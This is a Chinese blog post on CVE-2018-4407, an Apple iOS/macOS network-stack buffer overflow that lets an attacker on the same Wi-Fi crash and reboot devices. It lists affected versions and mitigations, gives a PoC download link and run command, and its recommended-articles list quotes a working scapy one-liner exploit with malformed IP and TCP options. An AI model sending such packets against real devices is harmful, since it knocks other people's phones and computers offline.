CVE-2018-4407缓冲区溢出

最新推荐文章于 2024-01-22 16:39:28 发布
最新推荐文章于 2024-01-22 16:39:28 发布
阅读量534 收藏
点赞数 1
分类专栏: 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jiajiajiang_/article/details/84138350
版权

此漏洞使得攻击者只要接入同一WIFI网络,即可向其他毫不知情的用户发送恶意数据包来触发Mac或IOS设备的崩溃和重启。由于该漏洞存在于系统网络核心代码,因此任何反病毒软件均无法防御。

 

易受攻击的设备:

Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备) Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新2018-001修复) Apple macOS Sierra(受影响的最高版本为10.12.6):所有设备(通过安全更新2018-005中修复) Apple OS X El Capitan及更早版本:所有设备

 

修复建议:

目前,苹果官方发布了ios12.1版本更新该漏洞,建议用户及时确认系统版本,如受影响,请及时采取修补措施,漏洞修补措施如下:

1.进行系统更新,更新到最新版本;

2.如果没有更新到最新版本,可以在macOS防火墙中启用隐藏模式可防止攻击,这个系统设置默认情况下不启用,需要用户手动开启;

3.不介入公共无线网络。触发该漏洞的唯一必要条件是处于同一网络,该漏洞不支持通过互联网发送恶意数据包而触发。

 

poc使用方法

脚本下载

链接:https://pan.baidu.com/s/1nJVjkWZ5TCLQU4HHNzg0wg
提取码:msoq
 

使用脚本

python check_icmp_dos.py 127.0.0.1

 

 

目标机器崩溃重启

 

一支神经病
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
centos7-sudo-1.9.9.rpm包。修复CVE-2021-3156,Sudo堆缓冲区溢出漏洞
01-30
此为centos7版的最新sudo-1.9.9.rpm包,修复修复CVE-2021-3156漏洞。 升级步骤: 1、将RPM包上传到服务器上, 2、执行升级命令: # rpm -Uvh sudo-1.9.9-1.el7.x86_64.rpm 3、执行完毕后,查询sudo版本: # sudo -V
Sudo缓冲区溢出漏洞(CVE-2021-3156)
04-06
linux sudo升级为1.9.5p2 及以上版本,sudo-1.9.10-1.el7.x86_64.rpm
centos6-sudo-1.9.9.rpm包;修复CVE-2021-3156,Sudo堆缓冲区溢出漏洞
01-30
此为centos6版的最新sudo-1.9.9.rpm包,修复修复CVE-2021-3156漏洞。 升级步骤: 1、将RPM包上传到服务器上, 2、执行升级命令: # rpm -Uvh sudo-1.9.9-1.el6.x86_64.rpm 3、执行完毕后,查询sudo版本: # sudo -V
CVE-2020-0796-PoC-master.zip
06-11
SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发缓冲区溢出,可能被攻击者利用远程执行任意代码。 SMBV3在通信过程中默认启动压缩/解压缩机制。如下图所示,攻击者在SMB压缩转换包的协议头中对OriginalSize值可控,这样OriginalSize以一个极大的值,写入固定的缓冲区中,造成缓冲区溢出。精心构造后可执行恶意命令。也就是压缩时所申请的内存大小小于解压后的大小,造成缓冲区溢出
CVE-2021-3156:有关CVE-2021-3156的注意事项
05-24
CVE-2021-3156 注意:这些说明是我自己的,并摘自我做过的信息流。 如果有任何问题,请通知我。 首先信任官方消息! 大家好, 几天前,在sudo中发现了严重的基于堆的缓冲区溢出,任何本地用户都可以利用该缓冲区溢出。 它的发现者将其命名为Baron Samedit。 即使未在sudoers文件中列出用户,也可以利用该错误将特权提升为root用户。 利用该漏洞不需要用户身份验证。 它通常称为 。 实际观看 您可以在看到一些安全研究人员已记录的实际操作。 受影响的Sudo版本: Sudo 1.8.2到1.8.31p2和1.9.0到1.9.5p1会受到影响。 注意事项:除非补丁已被反向移植,如Ubuntu 18.04那样,在这种情况下它 从TroyWolf 对于Ubuntu用户,修补后的sudo版本似乎与您正在运行的OS的版本有关。 Ubuntu站点显示此特定于发行版的漏洞信
[操作系统安全]缓冲区溢出
Freedomhy的博客
04-17 1695
ebp和esp用于管理栈空间,ebp指向栈底,esp指向栈顶,代码区中的函数调用、返回和执行都伴随着不断的压栈和清栈,在调用函数时,ebp会指向Previous Frame Pointer以在执行函数之后返回到原来的地址。1、缓冲区溢出是因为在程序执行时数据的长度超出了预先分配的空间大小,导致覆盖了其他数据的分配区域,从而执行非授权指令,获取信息,取得系统特权进而进行各种非法操作导致程序运行失败、系统宕机、重新启动等后果。将得到的机器码添加到foo1()函数中,并执行,即可将攻击代码注入。
计算机病毒发展史
鹿鸣天涯
09-02 5093
计算机病毒发展史 编程离不开数学原理的支持, 没有良好的数学思维就很难编写出高质量的程序. 每一个优秀软件产品背后都需要很深的数学算法为基础, "成功"的恶性程序也不例外. 一般而言, 这些恶性程序分为: 病毒(Virus), 蠕虫(Worm), 特洛伊木马(Trojan House). 下面为各位读者关于三者及最有影响的一些类型做个简单的介绍: 病毒 1能自我复制或运行的电脑程序; 2将自身附加至主程序来在计算机之间进行传播; 3盗窃数据等用户非自发引导的行为; 木马 1一种表面有用,但
计算机系统基础-缓冲区溢出攻击
m0_61400264的博客
09-12 1900
汇编,C语言
缓存区溢出的原理分析和防范
m0_57313444的博客
05-22 3215
缓冲区溢出(buffer-overflow)是一种非常普遍、同时非常危险的漏洞,在各种操作系统、应用软件中广泛存在。
什么是缓冲区溢出?深入解析:缓冲区溢出
大大怪的博客
08-28 4307
在计算机安全领域,缓冲区溢出是一种常见的安全漏洞,也被称为缓冲区溢出攻击。它是指当程序尝试向缓冲区写入数据时,超过了缓冲区的容量,导致数据溢出到相邻的内存区域。这种情况可能会导致程序崩溃、数据损坏,甚至允许攻击者执行恶意代码。
缓冲区溢出
Q1n6
10-20 879
缓冲区溢出,简单的说就是计算机对接收的输入数据没有进行有效的检测(理想的情况是程序检查数据长度并不允许输入超过缓冲区长度的字符),向缓冲区内填充数据时超过了缓冲区本身的容量,而导致数据溢出到被分配空间之外的内存空间,使得溢出的数据覆盖了其他内存空间的数据。 通过往程序的缓冲区写超出其长度的内容,造成缓冲区溢出,从而破坏程序的堆栈,造成程序崩溃或使程序转而执行其它指令,以达到攻击的目的。造成缓冲
linux通信缓存溢出,Linux缓冲区溢出基础
weixin_39998881的博客
05-14 425
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?我们知道,缓冲区就是暂时放置数据的地方,也就是说缓冲区其实就是变量,在程序开发中为了增加用户体验,往往需要用户输入,而用户的输入是不可控的,如果我们在程序中设定的缓冲区大小为32字节,那么用户输入超过32字节会怎么样呢?这样就会引发一个缓冲区溢出。通过溢出缓冲区可以控制栈中的ebp、eip等,这样就可以让目标系统实现特定...
什么是缓冲区溢出?有说明危害?
热门推荐
dreamispossible的博客
04-19 1万+
缓存溢出        缓存溢出(Buffer overflow) ,是指在存在缓存溢出安全漏洞的计算机中,攻击者可以用超出常规长度的字符数来填满-一个域,通常是内存区地址。在某些情况下,这些过量的字符能够作为“可执行”代码来运行。从而使得攻击者可以不受安全措施的约束来控制被攻击的计算机。    &nbsp...
BUU一血![Zabbix]CVE-2016-10134
qq_43801002的博客
04-25 898
zabbix: zabbix([`zæbiks])是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。 zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。 zabbix由2部分构成,zabbix server与可选组件zabbix agent。 zabbix server可以通过SNMP,zabbi...
[ vulhub漏洞复现篇 ] zabbix SQL注入漏洞 (CVE-2016-10134)
qq_51577576的博客
08-14 3210
👨‍🎓 博主介绍:大家好,我是,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋🙏作者水平有限,欢迎各位大佬指点,相互学习进步!......
zabbix latest.php SQL注入漏洞(CVE-2016-10134)
菜鸟耿耿
10-07 1418
zabbix latest.php SQL注入漏洞(CVE-2016-10134) zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。 一.环境搭建 zabbix 2.2.x, 3.0.0-3.0.3版本存在SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,进入后台后script等功能直接获取zabbix服务器的操作系统权限。 攻击机IP:192.168.35.128 靶机IP: 192.168.35.1
vulhub之Zabbix篇
最新发布
weixin_56306210的博客
01-22 688
vulhub之Zabbix篇
CVE-2018-4407(IOS缓冲区溢出漏洞)exp
weixin_30814223的博客
03-09 234
CVE-2018-4407为ios缓冲区溢出漏洞 exp: import scapyfrom scapy.all import * send(IP(dst="同一局域网内目标Ip",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)])) 漏洞范围: 运行以下操作系统的设...
Zabbix sql注入漏洞(CVE-2016-10134)
m0_65150886的博客
12-27 631
zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbix 的latest.php中的toggle idsI或isrpc.php种的profieldx2参数存在sql注入,通过sql注入获取管理员账户密码,进入后台,进行getshel操作。3.登录后,查看Cookie中的zbx_sessionid,复制后16位字符。6.利用jsrpc的profileIdx2参数sql注入获取用户名和密码。5.在攻击机访问的zabbix的地址后面加上如下url。
nginx缓冲区错误漏洞 cve-2022-41741
08-09
该漏洞主要是由于 Nginx 在处理特定请求时,没有正确地验证输入数据的长度,从而导致缓冲区溢出。攻击者可以通过构造恶意请求,利用缓冲区溢出漏洞来执行任意代码或者使服务器崩溃。 为了解决这个漏洞,建议您及时...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值